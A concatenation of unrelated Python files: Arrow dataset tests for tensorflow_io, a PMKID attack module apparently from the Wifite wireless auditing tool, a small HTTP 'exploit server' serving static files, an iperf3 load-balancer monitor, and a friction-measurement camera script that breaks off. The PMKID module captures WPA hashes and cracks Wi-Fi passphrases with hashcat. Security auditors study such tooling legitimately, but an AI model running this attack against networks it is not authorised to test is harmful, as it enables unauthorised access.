server.start()
dataset = arrow_io.ArrowStreamDataset.from_schema(host, batch.schema)
truth_data_mult = TruthData(
[d * num_batches for d in truth_data.data],
truth_data.output_types,
truth_data.output_shapes,
)
self.run_test_case(dataset, truth_data_mult)
server.join()
def test_arrow_unix_socket_dataset(self):
"""test_arrow_unix_socket_dataset"""
import tensorflow_io.arrow as arrow_io
if os.name == "nt":
self.skipTest("Unix Domain Sockets not supported on Windows")
truth_data = TruthData(
self.scalar_data + self.list_data,
self.scalar_dtypes + self.list_dtypes,
self.scalar_shapes + self.list_shapes,
)
batch = self.make_record_batch(truth_data)
host = os.path.join(tempfile.gettempdir(), "arrow_io_stream")
# Make sure the socket does not already exist
try:
os.unlink(host)
except OSError:
if os.path.exists(host):
raise
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(host)
sock.listen(1)
def run_server(num_batches):
conn, _ = sock.accept()
outfile = conn.makefile(mode="wb")
writer = pa.RecordBatchStreamWriter(outfile, batch.schema)
for _ in range(num_batches):
writer.write_batch(batch)
writer.close()
outfile.close()
conn.close()
sock.close()
# test with multiple batches, construct from schema
num_batches = 2
server = threading.Thread(target=run_server, args=(num_batches,))
server.start()
endpoint = "unix://{}".format(host)
dataset = arrow_io.ArrowStreamDataset.from_schema(endpoint, batch.schema)
truth_data_mult = TruthData(
[d * num_batches for d in truth_data.data],
truth_data.output_types,
truth_data.output_shapes,
)
self.run_test_case(dataset, truth_data_mult)
server.join()
def test_multiple_stream_hosts(self):
"""test_multiple_stream_hosts"""
import tensorflow_io.arrow as arrow_io
if os.name == "nt":
self.skipTest("Unix Domain Sockets not supported on Windows")
truth_data = TruthData(
self.scalar_data + self.list_data,
self.scalar_dtypes + self.list_dtypes,
self.scalar_shapes + self.list_shapes,
)
batch = self.make_record_batch(truth_data)
hosts = [
os.path.join(tempfile.gettempdir(), "arrow_io_stream_{}".format(i))
for i in range(1, 3)
]
def start_server(host):
"""start_server"""
try:
os.unlink(host)
except OSError:
if os.path.exists(host):
raise
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(host)
sock.listen(1)
def run_server(num_batches):
"""run_server"""
conn, _ = sock.accept()
outfile = conn.makefile(mode="wb")
writer = pa.RecordBatchStreamWriter(outfile, batch.schema)
for _ in range(num_batches):
writer.write_batch(batch)
writer.close()
outfile.close()
conn.close()
sock.close()
# test with multiple batches, construct from schema
server = threading.Thread(target=run_server, args=(1,))
server.start()
return server
servers = [start_server(h) for h in hosts]
endpoints = ["unix://{}".format(h) for h in hosts]
dataset = arrow_io.ArrowStreamDataset.from_schema(endpoints, batch.schema)
truth_data_mult = TruthData(
[d * len(hosts) for d in truth_data.data],
truth_data.output_types,
truth_data.output_shapes,
)
self.run_test_case(dataset, truth_data_mult)
for s in servers:
s.join()
def test_stream_from_pandas(self):
"""test_stream_from_pandas"""
import tensorflow_io.arrow as arrow_io
truth_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
batch_size = 2
# Test preserve index False
dataset = arrow_io.ArrowStreamDataset.from_pandas(
df, batch_size=batch_size, preserve_index=False
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
# Test preserve index True and select all but index columns
truth_data = TruthData(
truth_data.data + [range(len(truth_data.data[0]))],
truth_data.output_types + (tf.dtypes.int64,),
truth_data.output_shapes + (tf.TensorShape([]),),
)
dataset = arrow_io.ArrowStreamDataset.from_pandas(
df, batch_size=batch_size, preserve_index=True
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_stream_from_pandas_remainder(self):
"""Test stream from Pandas that produces partial batch"""
import tensorflow_io.arrow as arrow_io
batch_size = len(self.scalar_data[0]) - 1
truth_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
dataset = arrow_io.ArrowStreamDataset.from_pandas(
df, batch_size=batch_size, preserve_index=False
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_stream_from_pandas_iter(self):
"""test_stream_from_pandas_iter"""
import tensorflow_io.arrow as arrow_io
batch_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
batch = self.make_record_batch(batch_data)
df = batch.to_pandas()
batch_size = 2
num_iters = 3
dataset = arrow_io.ArrowStreamDataset.from_pandas(
(df for _ in range(num_iters)), batch_size=batch_size, preserve_index=False
)
truth_data = TruthData(
[d * num_iters for d in batch_data.data],
batch_data.output_types,
batch_data.output_shapes,
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_stream_from_pandas_not_batched(self):
"""test_stream_from_pandas_not_batched"""
import tensorflow_io.arrow as arrow_io
truth_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
dataset = arrow_io.ArrowStreamDataset.from_pandas(df, preserve_index=False)
self.run_test_case(dataset, truth_data)
def test_stream_from_pandas_repeat(self):
"""test_stream_from_pandas_repeat"""
import tensorflow_io.arrow as arrow_io
batch_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
batch = self.make_record_batch(batch_data)
df = batch.to_pandas()
num_repeat = 10
dataset = arrow_io.ArrowStreamDataset.from_pandas(
df, batch_size=2, preserve_index=False
).repeat(num_repeat)
# patch columns attr so run_test_case can use
dataset.columns = list(range(len(batch_data.output_types)))
truth_data = TruthData(
[d * num_repeat for d in batch_data.data],
batch_data.output_types,
batch_data.output_shapes,
)
self.run_test_case(dataset, truth_data, batch_size=2)
def test_bool_array_type(self):
"""NOTE: need to test this separately because to_pandas fails with
ArrowNotImplementedError: Not implemented type for list in
DataFrameBlock: bool
see https://issues.apache.org/jira/browse/ARROW-4370
"""
import tensorflow_io.arrow as arrow_io
truth_data = TruthData(
[[[False, False], [False, True], [True, False], [True, True]]],
(tf.dtypes.bool,),
(tf.TensorShape([None]),),
)
batch = self.make_record_batch(truth_data)
dataset = arrow_io.ArrowDataset.from_record_batches(
batch, truth_data.output_types, truth_data.output_shapes, columns=(0,)
)
self.run_test_case(dataset, truth_data)
def test_incorrect_column_type(self):
"""Test that a column with incorrect dtype raises error"""
import tensorflow_io.arrow as arrow_io
truth_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
batch = self.make_record_batch(truth_data)
dataset = arrow_io.ArrowDataset.from_record_batches(
batch,
tuple([tf.dtypes.int32 for _ in truth_data.output_types]),
truth_data.output_shapes,
)
with self.assertRaisesRegex(tf.errors.OpError, "Arrow type mismatch"):
self.run_test_case(dataset, truth_data)
def test_map_and_batch(self):
"""Test that using map then batch produces correct output. This will create
a map_and_batch_dataset_op that calls GetNext after end_of_sequence=true
"""
import tensorflow_io.arrow as arrow_io
truth_data = TruthData(
[list(range(10))], (tf.dtypes.int32,), (tf.TensorShape([]),)
)
batch = self.make_record_batch(truth_data)
dataset = arrow_io.ArrowDataset.from_record_batches(
batch, truth_data.output_types, truth_data.output_shapes
)
dataset = dataset.map(lambda x: x).batch(4)
expected = truth_data.data[0]
for result_tensors in dataset:
results = result_tensors.numpy()
for x in results:
self.assertTrue(expected, "Dataset has more output than expected")
self.assertEqual(x, expected[0])
expected.pop(0)
@pytest.mark.skip(reason="TODO")
def test_tf_function(self):
"""Test that an ArrowDataset can be used in tf.function call"""
import tensorflow_io.arrow as arrow_io
if not tf.version.VERSION.startswith("2."):
self.skipTest("Test requires TF2.0 for tf.function")
truth_data = TruthData(
[list(range(10)), [x * 1.1 for x in range(10)]],
(tf.dtypes.int32, tf.dtypes.float64),
(tf.TensorShape([]), tf.TensorShape([])),
)
@tf.function
def create_arrow_dataset(serialized_batch):
"""Create an arrow dataset from input tensor"""
dataset = arrow_io.ArrowDataset(
serialized_batch,
list(range(len(truth_data.output_types))),
truth_data.output_types,
truth_data.output_shapes,
)
return dataset
batch = self.make_record_batch(truth_data)
buf = io.BytesIO()
writer = pa.RecordBatchFileWriter(buf, batch.schema)
writer.write_batch(batch)
writer.close()
for row, results in enumerate(create_arrow_dataset(buf.getvalue())):
value = [result.numpy() for result in results]
self.assertEqual(value[0], truth_data.data[0][row])
self.assertAlmostEqual(value[1], truth_data.data[1][row], 4)
def test_batch_no_remainder(self):
"""Test batch_size that does not leave a remainder"""
import tensorflow_io.arrow as arrow_io
batch_size = len(self.scalar_data[0])
num_batches = 2
truth_data = TruthData(
[d * num_batches for d in self.scalar_data],
self.scalar_dtypes,
self.scalar_shapes,
)
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
dataset = arrow_io.ArrowDataset.from_pandas(
df, preserve_index=False, batch_size=batch_size
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_batch_remainder(self):
"""Test batch_size that does leave a remainder"""
import tensorflow_io.arrow as arrow_io
batch_size = len(self.scalar_data[0]) - 1
truth_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
dataset = arrow_io.ArrowDataset.from_pandas(
df, preserve_index=False, batch_size=batch_size
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_batch_drop_remainder(self):
"""Test batch_size that drops remainder data"""
import tensorflow_io.arrow as arrow_io
batch_size = len(self.scalar_data[0]) - 1
truth_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
truth_data_drop_last = TruthData(
[d[:-1] for d in truth_data.data],
truth_data.output_types,
truth_data.output_shapes,
)
dataset = arrow_io.ArrowDataset.from_pandas(
df, preserve_index=False, batch_size=batch_size, batch_mode="drop_remainder"
)
self.run_test_case(dataset, truth_data_drop_last, batch_size=batch_size)
def test_batch_mode_auto(self):
"""Test auto batch_mode to size to record batch number of rows"""
import tensorflow_io.arrow as arrow_io
num_batches = 2
single_batch_data = TruthData(
self.scalar_data, self.scalar_dtypes, self.scalar_shapes
)
batch = self.make_record_batch(single_batch_data)
batches = [batch] * num_batches
truth_data = TruthData(
[d * num_batches for d in single_batch_data.data],
single_batch_data.output_types,
single_batch_data.output_shapes,
)
dataset = arrow_io.ArrowDataset.from_record_batches(
batches,
truth_data.output_types,
truth_data.output_shapes,
batch_mode="auto",
)
self.run_test_case(dataset, truth_data, batch_size=batch.num_rows)
def test_batch_with_partials(self):
"""Test batch_size that divides an Arrow record batch into
partial batches
"""
import tensorflow_io.arrow as arrow_io
num_batches = 3
batch_size = int(len(self.scalar_data[0]) * 1.5)
single_batch_data = TruthData(
self.scalar_data, self.scalar_dtypes, self.scalar_shapes
)
batch = self.make_record_batch(single_batch_data)
batches = [batch] * num_batches
truth_data = TruthData(
[d * num_batches for d in single_batch_data.data],
single_batch_data.output_types,
single_batch_data.output_shapes,
)
# Batches should divide input without remainder
self.assertEqual(len(truth_data.data[0]) % batch_size, 0)
dataset = arrow_io.ArrowDataset.from_record_batches(
batches,
truth_data.output_types,
truth_data.output_shapes,
batch_size=batch_size,
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_batch_with_partials_and_remainder(self):
"""Test batch_size that divides an Arrow record batch into
partial batches and leaves remainder data
"""
import tensorflow_io.arrow as arrow_io
num_batches = 3
batch_size = len(self.scalar_data[0]) + 1
single_batch_data = TruthData(
self.scalar_data, self.scalar_dtypes, self.scalar_shapes
)
batch = self.make_record_batch(single_batch_data)
batches = [batch] * num_batches
truth_data = TruthData(
[d * num_batches for d in single_batch_data.data],
single_batch_data.output_types,
single_batch_data.output_shapes,
)
# Batches should divide input and leave a remainder
self.assertNotEqual(len(truth_data.data[0]) % batch_size, 0)
dataset = arrow_io.ArrowDataset.from_record_batches(
batches,
truth_data.output_types,
truth_data.output_shapes,
batch_size=batch_size,
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_batch_spans_mulitple_partials(self):
"""Test large batch_size that spans mulitple Arrow record batches"""
import tensorflow_io.arrow as arrow_io
num_batches = 6
batch_size = int(len(self.scalar_data[0]) * 3)
single_batch_data = TruthData(
self.scalar_data, self.scalar_dtypes, self.scalar_shapes
)
batch = self.make_record_batch(single_batch_data)
batches = [batch] * num_batches
truth_data = TruthData(
[d * num_batches for d in single_batch_data.data],
single_batch_data.output_types,
single_batch_data.output_shapes,
)
dataset = arrow_io.ArrowDataset.from_record_batches(
batches,
truth_data.output_types,
truth_data.output_shapes,
batch_size=batch_size,
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_batch_fixed_lists(self):
"""Test batching with fixed length list types"""
import tensorflow_io.arrow as arrow_io
batch_size = int(len(self.list_fixed_data[0]) / 2)
truth_data = TruthData(
self.list_fixed_data, self.list_fixed_dtypes, self.list_fixed_shapes
)
batch = self.make_record_batch(truth_data)
dataset = arrow_io.ArrowDataset.from_record_batches(
[batch],
truth_data.output_types,
truth_data.output_shapes,
batch_size=batch_size,
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_batch_variable_length_list_batched(self):
"""Test batching with variable length lists raises error"""
import tensorflow_io.arrow as arrow_io
batch_size = len(self.list_var_data[1])
truth_data = TruthData(
self.list_var_data, self.list_var_dtypes, self.list_var_shapes
)
batch = self.make_record_batch(truth_data)
dataset = arrow_io.ArrowDataset.from_record_batches(
[batch],
truth_data.output_types,
truth_data.output_shapes,
batch_size=batch_size,
)
with self.assertRaisesRegex(tf.errors.OpError, "variable.*unsupported"):
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_batch_variable_length_list_unbatched(self):
"""Test unbatched variable length lists"""
import tensorflow_io.arrow as arrow_io
batch_size = None
truth_data = TruthData(
self.list_var_data, self.list_var_dtypes, self.list_var_shapes
)
batch = self.make_record_batch(truth_data)
dataset = arrow_io.ArrowDataset.from_record_batches(
[batch],
truth_data.output_types,
truth_data.output_shapes,
batch_size=batch_size,
)
self.run_test_case(dataset, truth_data, batch_size=batch_size)
def test_unsupported_batch_mode(self):
"""Test using an unsupported batch mode"""
import tensorflow_io.arrow as arrow_io
truth_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
with self.assertRaisesRegex(ValueError, "Unsupported batch_mode.*doh"):
arrow_io.ArrowDataset.from_record_batches(
[self.make_record_batch(truth_data)],
truth_data.output_types,
truth_data.output_shapes,
batch_mode="doh",
)
def test_arrow_list_feather_columns(self):
"""test_arrow_list_feather_columns"""
import tensorflow_io.arrow as arrow_io
from pyarrow.feather import write_feather
# Feather files currently do not support columns of list types
truth_data = TruthData(self.scalar_data, self.scalar_dtypes, self.scalar_shapes)
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
# Create a tempfile that is deleted after tests run
with tempfile.NamedTemporaryFile(delete=False) as f:
write_feather(df, f, version=1)
# test single file
# prefix "file://" to test scheme file system (e.g., s3, gcs, azfs, ignite)
columns = arrow_io.list_feather_columns("file://" + f.name)
for name, dtype in list(zip(batch.schema.names, batch.schema.types)):
assert columns[name].name == name
assert columns[name].dtype == dtype
assert columns[name].shape == [4]
# test memory
with open(f.name, "rb") as ff:
memory = ff.read()
# when memory is provided filename doesn't matter:
columns = arrow_io.list_feather_columns("file:///non_exist", memory=memory)
for name, dtype in list(zip(batch.schema.names, batch.schema.types)):
assert columns[name].name == name
assert columns[name].dtype == dtype
assert columns[name].shape == [4]
os.unlink(f.name)
if __name__ == "__main__":
test.main()
|
pmkid.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from ..model.attack import Attack
from ..config import Configuration
from ..tools.hashcat import HcxDumpTool, HcxPcapTool, Hashcat
from ..util.color import Color
from ..util.timer import Timer
from ..model.pmkid_result import CrackResultPMKID
from threading import Thread
import os
import time
import re
class AttackPMKID(Attack):
def __init__(self, target):
super(AttackPMKID, self).__init__(target)
self.crack_result = None
self.success = False
self.pcapng_file = Configuration.temp('pmkid.pcapng')
def get_existing_pmkid_file(self, bssid):
'''
Load PMKID Hash from a previously-captured hash in ./hs/
Returns:
The hashcat hash (hash*bssid*station*essid) if found.
None if not found.
'''
if not os.path.exists(Configuration.wpa_handshake_dir):
return None
bssid = bssid.lower().replace(':', '')
file_re = re.compile('.*pmkid_.*\.16800')
for filename in os.listdir(Configuration.wpa_handshake_dir):
pmkid_filename = os.path.join(Configuration.wpa_handshake_dir, filename)
if not os.path.isfile(pmkid_filename):
continue
if not re.match(file_re, pmkid_filename):
continue
with open(pmkid_filename, 'r') as pmkid_handle:
pmkid_hash = pmkid_handle.read().strip()
if pmkid_hash.count('*') < 3:
continue
existing_bssid = pmkid_hash.split('*')[1].lower().replace(':', '')
if existing_bssid == bssid:
return pmkid_filename
return None
def run(self):
'''
Performs PMKID attack, if possible.
1) Captures PMKID hash (or re-uses existing hash if found).
2) Cracks the hash.
Returns:
True if handshake is captured. False otherwise.
'''
from ..util.process import Process
# Check that we have all hashcat programs
dependencies = [
Hashcat.dependency_name,
HcxDumpTool.dependency_name,
HcxPcapTool.dependency_name
]
missing_deps = [dep for dep in dependencies if not Process.exists(dep)]
if len(missing_deps) > 0:
Color.pl('{!} Skipping PMKID attack, missing required tools: {O}%s{W}' % ', '.join(missing_deps))
return False
pmkid_file = None
if Configuration.ignore_old_handshakes == False:
# Load exisitng PMKID hash from filesystem
pmkid_file = self.get_existing_pmkid_file(self.target.bssid)
if pmkid_file is not None:
Color.pattack('PMKID', self.target, 'CAPTURE',
'Loaded {C}existing{W} PMKID hash: {C}%s{W}\n' % pmkid_file)
if pmkid_file is None:
# Capture hash from live target.
pmkid_file = self.capture_pmkid()
if pmkid_file is None:
return False # No hash found.
# Crack it.
try:
self.success = self.crack_pmkid_file(pmkid_file)
except KeyboardInterrupt:
Color.pl('\n{!} {R}Failed to crack PMKID: {O}Cracking interrupted by user{W}')
self.success = False
return False
return True # Even if we don't crack it, capturing a PMKID is 'successful'
def capture_pmkid(self):
'''
Runs hashcat's hcxpcaptool to extract PMKID hash from the .pcapng file.
Returns:
The PMKID hash (str) if found, otherwise None.
'''
self.keep_capturing = True
self.timer = Timer(Configuration.pmkid_timeout)
# Start hcxdumptool
t = Thread(target=self.dumptool_thread)
t.start()
# Repeatedly run pcaptool & check output for hash for self.target.essid
pmkid_hash = None
pcaptool = HcxPcapTool(self.target)
while self.timer.remaining() > 0:
pmkid_hash = pcaptool.get_pmkid_hash(self.pcapng_file)
if pmkid_hash is not None:
break # Got PMKID
Color.pattack('PMKID', self.target, 'CAPTURE',
'Waiting for PMKID ({C}%s{W})' % str(self.timer))
time.sleep(1)
self.keep_capturing = False
if pmkid_hash is None:
Color.pattack('PMKID', self.target, 'CAPTURE',
'{R}Failed{O} to capture PMKID\n')
Color.pl('')
return None # No hash found.
Color.clear_entire_line()
Color.pattack('PMKID', self.target, 'CAPTURE', '{G}Captured PMKID{W}')
pmkid_file = self.save_pmkid(pmkid_hash)
return pmkid_file
def crack_pmkid_file(self, pmkid_file):
'''
Runs hashcat containing PMKID hash (*.16800).
If cracked, saves results in self.crack_result
Returns:
True if cracked, False otherwise.
'''
# Check that wordlist exists before cracking.
if Configuration.wordlist is None:
Color.pl('\n{!} {O}Not cracking PMKID ' +
'because there is no {R}wordlist{O} (re-run with {C}--dict{O})')
# TODO: Uncomment once --crack is updated to support recracking PMKIDs.
#Color.pl('{!} {O}Run Wifite with the {R}--crack{O} and {R}--dict{O} options to try again.')
key = None
else:
Color.clear_entire_line()
Color.pattack('PMKID', self.target, 'CRACK', 'Cracking PMKID using {C}%s{W} ...\n' % Configuration.wordlist)
key = Hashcat.crack_pmkid(pmkid_file)
if key is None:
# Failed to crack.
if Configuration.wordlist is not None:
Color.clear_entire_line()
Color.pattack('PMKID', self.target, '{R}CRACK',
'{R}Failed {O}Passphrase not found in dictionary.\n')
return False
else:
# Successfully cracked.
Color.clear_entire_line()
Color.pattack('PMKID', self.target, 'CRACKED', '{C}Key: {G}%s{W}' % key)
self.crack_result = CrackResultPMKID(self.target.bssid, self.target.essid,
pmkid_file, key)
Color.pl('\n')
self.crack_result.dump()
return True
def dumptool_thread(self):
'''Runs hashcat's hcxdumptool until it dies or `keep_capturing == False`'''
dumptool = HcxDumpTool(self.target, self.pcapng_file)
# Let the dump tool run until we have the hash.
while self.keep_capturing and dumptool.poll() is None:
time.sleep(0.5)
dumptool.interrupt()
def save_pmkid(self, pmkid_hash):
'''Saves a copy of the pmkid (handshake) to hs/ directory.'''
# Create handshake dir
if not os.path.exists(Configuration.wpa_handshake_dir):
os.makedirs(Configuration.wpa_handshake_dir)
# Generate filesystem-safe filename from bssid, essid and date
essid_safe = re.sub('[^a-zA-Z0-9]', '', self.target.essid)
bssid_safe = self.target.bssid.replace(':', '-')
date = time.strftime('%Y-%m-%dT%H-%M-%S')
pmkid_file = 'pmkid_%s_%s_%s.16800' % (essid_safe, bssid_safe, date)
pmkid_file = os.path.join(Configuration.wpa_handshake_dir, pmkid_file)
Color.p('\n{+} Saving copy of {C}PMKID Hash{W} to {C}%s{W} ' % pmkid_file)
with open(pmkid_file, 'w') as pmkid_handle:
pmkid_handle.write(pmkid_hash)
pmkid_handle.write('\n')
return pmkid_file
|
server.py
|
import os
import threading
import socket
from http.server import BaseHTTPRequestHandler, HTTPServer
class ExploitHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
mimeType = 'text/html'
if self.path == '/':
self.path = '/index.html'
if self.path == '/favicon.ico':
return
if '.mp4' in self.path:
mimeType = 'video/mp4'
self.send_header('Content-type', mimeType)
self.end_headers()
file_path = os.path.join(os.path.join(os.getcwd(), 'site/'), self.path[1:len(self.path)])
with open(file_path, 'rb') as html_data:
self.wfile.write(html_data.read())
return
class ExploitServer():
def __init__(self):
self.listen_port = 8000
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
self.machine_ip = s.getsockname()[0]
s.close()
self.server_address = ('0.0.0.0', self.listen_port)
def start(self):
print("Exploit server listening at {}".format(self.get_listen_url()))
self.server = HTTPServer(self.server_address, ExploitHandler)
self.listenThread = threading.Thread(target=self.server.serve_forever)
self.listenThread.daemon = True
self.listenThread.start()
def stop(self):
print("Stopping exploit server")
self.server.shutdown()
self.server.socket.close()
def get_listen_url(self):
return "http://{}:{}".format(self.machine_ip, self.listen_port)
def handle_message(self, message):
getattr(self, message)()
def background(self):
nothing = True
|
monitor.py
|
import subprocess
import threading
import time
import json
import requests
import sys
controller_ip_port = 'localhost:8080'
def getThroughput(pool_id, id, ip):
p = subprocess.Popen('iperf3 -c ' + ip + ' -p 500 -w 500 k -J --connect-timeout 10000', stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
stdout, stderr = p.communicate()
if(stderr):
print(stderr.decode('utf-8'))
else:
output = json.loads(stdout)
if(len(output['end']) == 0):
# print(pool_id, ip, 'OFF')
obj = {"id": id, "pool_id": pool_id, "throughput": '-1'}
r = requests.put('http://'+controller_ip_port+'/quantum/v1.0/members/'+id+'/', json = obj)
else:
for i in output['end']['streams']:
obj = {"id": id, "pool_id": pool_id, "throughput": i['sender']['bits_per_second']}
r = requests.put('http://'+controller_ip_port+'/quantum/v1.0/members/'+id+'/', json = obj)
# print('http://'+controller_ip_port+'/quantum/v1.0/members/'+id+'/', obj)
return
def handlePool(pool_id):
threads = list()
r = requests.get('http://' + controller_ip_port + '/quantum/v1.0/pools/' + pool_id + '/members/')
members = json.loads(r.text)
for member in members:
id = member['id']
ip = member['address']
x = threading.Thread(target=getThroughput, args=(pool_id, id, ip, ))
threads.append(x)
x.start()
for thread in threads:
thread.join()
return
if __name__ == "__main__":
threadsP = list()
while True:
threadsP.clear()
r = requests.get('http://' + controller_ip_port + '/quantum/v1.0/pools/')
pools = json.loads(r.text)
for pool in pools:
pool_id = pool['id']
if(pool['lbMethod'] == 'LTP'):
x = threading.Thread(target=handlePool, args=(pool_id, ))
threadsP.append(x)
x.start()
for thread in threadsP:
thread.join()
print('Tests done, waiting...\n')
time.sleep(5)
|
main.py
|
from threading import Thread
from imutils.video import VideoStream
import cv2
import time
import imutils
import math
import argparse
import matplotlib.pyplot as plt
import numpy as np
parser = argparse.ArgumentParser(
description='This program calculates either the static or kinetic friction coefficient between two surfaces.')
parser.add_argument('mode', type=str, default=None,
help='Chose mode. The mode can either be "static" or "kinetic"')
args = parser.parse_args()
mode = args.mode
class Vision(Thread):
def __init__(self, system):
super().__init__()
self.camera = VideoStream(usePiCamera=True, resolution=(688, 528)).start()
time.sleep(0.5)
self.tracker = cv2.TrackerMOSSE_create()
self.isTracking = None
self.initBB = None
self.frame = None
self.initial_target_object_center = None
self.initial_time = time.time()
self.moving = False
self.motion_detected = False
self.speed = 0
self.system = system
self.is_running = True
self.framesToShow = dict()
self.isWindowShowEnabled = False
self.key = "empty"
self.coefficient_of_static_friction = 0.0
self.coefficient_of_kinetic_friction = 0.0
def run(self):
while self.is_running:
frame = self.camera.read()
# Object tracking
if self.isTracking:
(success, box) = self.tracker.update(frame)
if success:
(x, y, w, h) = [int(v) for v in box]
frame = cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
final_target_object_center = (x + w / 2, y + h / 2)
self.speed = self.get_speed(final_target_object_center)
if self.speed > frame.shape[0] * frame.shape[1] / 100000:
self.motion_detected = True
self.system.start_recording()
self.moving = True
else:
self.moving = False
# Arrange the screen
frame = self.arrange_screen(frame)
self.showFrame(frame)
self.isWindowShowEnabled = False
plt.close()
# Arrange the general screen
def arrange_screen(self, frame):
# General Screen
frame = cv2.rectangle(frame, (0, 490), (688, 528), (0, 0, 0), -1)
frame = cv2.rectangle(frame, (510, 0), (688, 30), (0, 0, 0), -1)
frame = cv2.putText(frame, "Angle:" + str(round(self.system.pot_angle, 1)), (10, 517), cv2.FONT_HERSHEY_SIMPLEX,
1, (0, 0, 200), 2, cv2.LINE_AA)
frame = cv2.putText(frame, "Distance:" + str(round(self.system.sonar, 2)), (520, 20), cv2.FONT_HERSHEY_SIMPLEX,
0.7, (0, 0, 200), 2, cv2.LINE_AA)
# Custom Screen Settings
if mode == "static":
frame = self.arrange_screen_static(frame)
elif mode == "kinetic":
frame = self.arrange_screen_kinetic(frame)
else:
raise Exception("Wrong mode selected. Please Specify the mode as either 'static' or 'kinetic'")
return frame
# Specialize arrange_screen for static friction calculations
def arrange_screen_static(self, frame):
if self.moving:
frame = cv2.putText(frame, "Moved!", (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 200), 2, cv2.LINE_AA)
self.coefficient_of_static_friction = round(math.tan(math.pi * self.system.pot_angle / 180.0), 2)
if self.motion_detected:
frame = cv2.putText(frame, "coefficient of static friction:" + str(self.coefficient_of_static_friction),
(300, 517), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 0, 200), 1, cv2.LINE_AA)
return frame
# Specialize arrange_screen for kinetic friction calculations
def arrange_screen_kinetic(self, frame):
if self.motion_detected:
frame = cv2.putText(frame, "Started Measuring!", (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 200), 2,
cv2.LINE_AA)
frame = cv2.putText(frame, "Press the button to stop measuring", (50, 100), cv2.FONT_HERSHEY_SIMPLEX, 1.0,
(0, 0, 200), 2, cv2.LINE_AA)
if self.moving:
self.system.set_motor_speed(0)
# End reading data
if self.system.button_state and len(self.system.recorded_data) > 10:
# Stop mechanism
self.system.set_motor_speed(0)
self.motion_detected = False
# Process the recorded data
data = self.system.end_recording_data()
x = list()
y = list()
for i in data:
x.append(i["time_stamp"])
y.append(i["distance"] / 100.0)
p = plotter()
position_v_time = [x, y]
position_v_time = p.trim_data(position_v_time)
p.plot("Position", position_v_time)
position_v_time_eq = p.plot_equation("Position", position_v_time)
velocity_v_time_eq = p.take_derivative(position_v_time_eq)
acceleration_v_time_eq = p.take_derivative(velocity_v_time_eq)
_ = p.plot_equation("Velocity", position_v_time, eq=velocity_v_time_eq)
_ = p.plot_equation("Acceleration", position_v_time, eq=acceleration_v_time_eq)
print("\n\n*********************")
print("Position vs. Time Graph's Equation is:")
print(position_v_time_eq)
print("\n*********************")
print("Velocity vs. Time Graph's Equation is:", velocity_v_time_eq)
print("*********************")
print("Acceleration vs. Time Graph's Equation is:", acceleration_v_time_eq, "\n", "*********************")
coefficient_of_static_friction = round(math.tan(math.pi * self.system.pot_angle / 180.0), 2) - float(acceleration_v_time_eq.c[0]) / (9.81 * round(math.cos(math.pi * self.system.pot_angle / 180.0), 2))
print("Therefore the coefficient of kinetic friction is:{}".format(coefficient_of_static_friction))
p.show()
return frame
# Multi-threaded window showing function
def showFrame(self, frameToShow, windowName="Frame"):
self.framesToShow[windowName] = frameToShow
if not self.isWindowShowEnabled:
self.isWindowShowEnabled = True
Thread(target=self.__updateWindowFrame__, args=()).start()
# Thread for updating the frame
def __updateWindowFrame__(self):
while self.isWindowShowEnabled:
for name in self.framesToShow.copy():
cv2.imshow(name, self.framesToShow[name])
self.key = cv2.waitKey(30)
if self.key == ord("s"):
initBB = cv2.selectROI("Frame", self.framesToShow["Frame"], fromCenter=False, showCrosshair=True)
self.tracker.init(self.framesToShow["Frame"], initBB)
self.isTracking = True
if self.key == ord('r'):
self.motion_detected = False
self.tracker = cv2.TrackerMOSSE_create()
self.isTracking = False
self.system.enabled_recording = False
self.system.recorded_data = list()
cv2.destroyAllWindows()
# Calculate the velocity(pixel/seconds) of the selected object
def get_speed(self, target_center):
elapsed = time.time() - self.initial_time
if self.initial_target_object_center is None:
self.initial_target_object_center = target_center
speed = 0
else:
displacement = ((target_center[0] - self.initial_target_object_center[0]) ** 2 +
(target_center[1] - self.initial_target_object_center[1]) ** 2) ** 0.5
speed = displacement / elapsed
self.initial_time = time.time()
self.initial_target_object_center = target_center
return speed
class plotter:
def __init__(self):
